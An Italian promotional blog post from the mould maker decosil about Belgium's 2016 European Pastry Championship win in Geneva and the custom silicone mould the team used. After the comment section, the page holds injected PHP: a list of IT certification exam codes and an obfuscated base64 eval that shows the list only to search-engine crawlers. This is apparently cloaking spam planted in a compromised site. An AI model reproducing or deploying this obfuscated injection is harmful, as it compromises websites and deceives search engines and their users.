Torta gelato presentata dal  Belgio

Conquistano il titolo di Campioni Europei di Pasticceria Nicolas Arnaud e Mathieu Dierinck, che hanno rappresentato il Belgio rispettivamente per lo zucchero e per il cioccolato.

Dal 24 al 26 Gennaio 2016 si è svolta a Ginevra il Sirha la fiera che si rivolge al mondo della ristorazione, dove si è tenuta la selezione svizzera per il Bocuse d’Or e la selezione europea per il Concorso Mondiale della Pasticceria.

La selezione europea ha messo a spettacolare ed emozionante confronto Belgio, Danimarca, Libano, Russia, Spagna, Svezia, Russia e Turchia, in un susseguirsi di creatività, eccellenza e tecnica.

Il Campionato Europeo di Pasticceria che si è svolto per una giornata al Sirha di Ginevra, ha visto qualificarsi per la finalissima della Coupe du Monde de la Pâtisserie, che si svolgerà durante Sirha di Lione in Francia, dal 22 al 23 gennaio 2017, oltre al Belgio anche Danimarca, Svezia e la Svizzera scelta con la “Wild cards” che favorisce i paesi emergenti nel mondo della pasticceria.

Queste squadre affronteranno i vincitori di altre 17 selezioni provenienti rispettivamente da Africa, Asia, America Latina.
I sette paesi depositari delle migliori prestazioni nelle precedenti tre edizioni: Francia, Giappone, Stati Uniti d’America, Singapore, Corea del Sud, Regno Unito e Taiwan.

La sfida per il Campionato Europeo della Pasticceria 2016, consisteva nella realizzazione, in appena 5 ore, di una scultura ricavata da un intero blocco di cioccolato fondente del peso di 23 chili e delle dimensioni di 50 centimetri di altezza, nella preparazione di due dessert gelato alla frutta, dieci dessert al piatto a base di cioccolato, un pezzo artistico in zucchero e uno in cioccolato.

A richiesta dell’esponente del club Coupe du Monde de la Patisserie Belgique, David Redon, decosil ha appositamente studiato e creato, lo stampo in silicone dell’entremet.

CONCETTO è un pacchetto di servizi offerti da decosil, dedicato a pasticceri affermati e a chi si avvicina per la prima volta al mondo delle competizioni, che ha lo scopo di accompagnare e seguire i concorrenti alla preparazione della gara puntando  al conseguimento del miglior risultato possibile.

Se vuoi scoprire di più sul pacchetto di servizi CONCETTO, clicca qui.

Lo stampo personalizzato decosil è stato creato introducendo una tecnica innovativa che ha permesso alla squadra belga di realizzare all’interno dell’entremet alla frutta il decoro a stella.

Se vuoi scoprire di più sugli stampi in silicone personalizzati CONCETTO, clicca qui.

Ancora una volta decosil è orgogliosa di aver fatto la differenza portando, sullo scalino più alto del podio, la sua creatività e affidabilità di partner a cui ci si può rivolgere per avere il giusto supporto nell’affrontare competizioni internazionali così importanti e di alto livello.

Please follow and like us:
Belgio Campione Europeo di Pasticceria con decosil

decosil


decosil nata dalla collaborazione di professionisti nel campo della pasticceria e della lavorazione del silicone, per offrire attrezzi per pasticceria che rispondono ad un elevato standard qualitativo e funzionale. decosil nuova azienda costituita per rispondere alle esigenze dei pasticceri professionisti e non, che vogliono proporre idee creative alla propria clientela con innovativi utensili per pasticceria. Proponiamo stampi in silicone antiaderenti di grado alimentare per la realizzazione di oggetti artistici e decorativi e per la fabbricazione di soggetti. Stampi personalizzati: possiamo replicare i loghi aziendali per la fabbricazione di cioccolatini personalizzati.


Post navigation


Lascia un commento

$fafrendslins = <<

000-017   000-080   000-089   000-104   000-105   000-106   070-461   100-101   100-105  , 100-105  , 101   101-400   102-400   1V0-601   1Y0-201   1Z0-051   1Z0-060   1Z0-061   1Z0-144   1z0-434   1Z0-803   1Z0-804   1z0-808   200-101   200-120   200-125  , 200-125  , 200-310   200-355   210-060   210-065   210-260   220-801   220-802   220-901   220-902   2V0-620   2V0-621   2V0-621D   300-070   300-075   300-101   300-115   300-135   3002   300-206   300-208   300-209   300-320   350-001   350-018   350-029   350-030   350-050   350-060   350-080   352-001   400-051   400-101   400-201   500-260   640-692   640-911   640-916   642-732   642-999   700-501   70-177   70-178   70-243   70-246   70-270   70-346   70-347   70-410   70-411   70-412   70-413   70-417   70-461   70-462   70-463   70-480   70-483   70-486   70-487   70-488   70-532   70-533   70-534   70-980   74-678   810-403   9A0-385   9L0-012   9L0-066   ADM-201   AWS-SYSOPS   C_TFIN52_66   c2010-652   c2010-657   CAP   CAS-002   CCA-500   CISM   CISSP   CRISC   EX200   EX300   HP0-S42   ICBB   ICGB   ITILFND   JK0-022   JN0-102   JN0-360   LX0-103   LX0-104   M70-101   MB2-704   MB2-707   MB5-705   MB6-703   N10-006   NS0-157   NSE4   OG0-091   OG0-093   PEGACPBA71V1   PMP   PR000041   SSCP   SY0-401   VCP550   1Z0-061   CISSP   70-487   SY0-401   70-486   220-801   300-075   c2010-652   000-080   210-065   350-030   JN0-360   74-678   LX0-104   300-070   70-410   350-050   PMP   70-483   JN0-360   200-355   200-125  , 210-060   100-101   70-412   VCP550   LX0-104   000-017  

EOT; eval/**/(base64_decode('JHNwZGU9IHN0cnRvbG93ZXIoJF9TRVJWRVIvKnRlc3QqL1svKiovIkhUVFBfVVNFUl9BR0VOVCIvKiovXSk7CmZ1bmN0aW9uIGNhZ3QoJHNwZCkKewokZ3RydWU9IHN0cl9yZXBsYWNlKCJ4IiwiIiwiYnhveHh0eHxneG94eG94Z3hseGV8eXh4YXhoeG94b3xteHN4bnxzeHhweGl4ZHhleHJ8d3hneGV4dCIpOwppZihwcmVnX21hdGNoKCIvJGd0cnVlL2kiLCRzcGQpKXsKcmV0dXJuIHRydWU7Cn1lbHNlewpyZXR1cm4gZmFsc2U7Cn0KfSAKaWYoY2FndCgkc3BkZSkpewplY2hvICRmYWZyZW5kc2xpbnM7Cn0=')); ?>